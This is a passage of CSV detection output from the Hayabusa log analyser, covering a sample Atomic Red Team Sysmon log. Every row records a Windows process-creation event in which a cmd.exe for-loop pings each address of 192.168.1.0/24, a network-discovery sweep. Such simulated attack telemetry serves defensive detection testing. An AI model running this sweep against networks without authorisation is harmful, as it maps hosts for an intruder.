192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:01.515 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.174 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:02.019 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.175 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:02.556 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.176 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:03.031 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.177 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:03.557 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.178 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:04.044 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.179 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:04.539 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.180 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:05.023 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.181 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:05.517 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.182 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:06.023 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.183 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:06.535 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.184 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:07.047 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.185 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:07.533 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.186 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:07.912 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.187 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:08.521 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.188 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:09.043 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.189 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:09.515 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.190 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:10.036 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.191 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:10.556 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.192 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:11.022 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.193 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:11.504 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.194 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:12.040 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.195 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:12.537 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.196 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:13.022 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.197 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:13.509 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.198 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:14.020 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.199 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:14.513 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.200 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:15.001 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.201 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:15.518 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.202 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:16.026 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.203 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:16.521 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.204 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:17.037 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.205 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:17.438 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.206 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:18.043 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.207 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:18.544 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.208 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:19.012 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.209 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:19.546 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.210 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:20.009 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.211 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:20.571 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.212 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:21.020 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.213 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:21.520 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.214 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:22.035 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.215 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:22.520 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.216 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:23.011 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.217 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:23.546 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.218 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:23.993 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.219 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:24.504 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.220 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:25.008 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.221 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:25.544 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.222 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:26.004 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.223 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:26.430 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.224 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:27.009 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.225 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:27.555 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.226 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:28.035 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.227 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:28.511 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.228 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:29.009 +09:00,MSEDGEWIN10,1,informational,Process 